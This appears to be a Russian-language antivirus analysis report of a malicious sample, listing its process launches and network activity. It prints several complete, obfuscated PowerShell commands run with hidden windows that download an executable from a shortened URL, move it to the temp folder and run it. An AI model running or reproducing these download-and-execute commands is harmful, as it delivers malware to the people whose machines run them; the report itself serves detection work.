Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c p^ower^shell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke(('ht'+'tps://tinyurl.com/y5gj5x4n'),'ui.exe')
- '<SYSTEM32>\cmd.exe' /c p^ower^shell -w 1 Start-Sleep 10; Move-Item "ui.exe" -Destination "$env:temp"
- '<SYSTEM32>\cmd.exe' /c po^wer^shell -w 1 Start-Sleep 16; sTArt-`P`R`ocess $env:temp\ui.exe
Сетевая активность
TCP
- 'ti##url.com':443
- 'we##help.de':443
UDP
- DNS ASK ti##url.com
- DNS ASK we##help.de
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c p^ower^shell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke(('ht'+'tps://tinyurl.com/y5gj5x4n'),'ui.exe')' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c p^ower^shell -w 1 Start-Sleep 10; Move-Item "ui.exe" -Destination "$env:temp"' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c po^wer^shell -w 1 Start-Sleep 16; sTArt-`P`R`ocess $env:temp\ui.exe' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke(('ht'+'tps://tinyurl.com/y5gj5x4n'),'ui.exe')
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w 1 Start-Sleep 10; Move-Item "ui.exe" -Destination "$env:temp"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w 1 Start-Sleep 16; sTArt-`P`R`ocess $env:temp\ui.exe
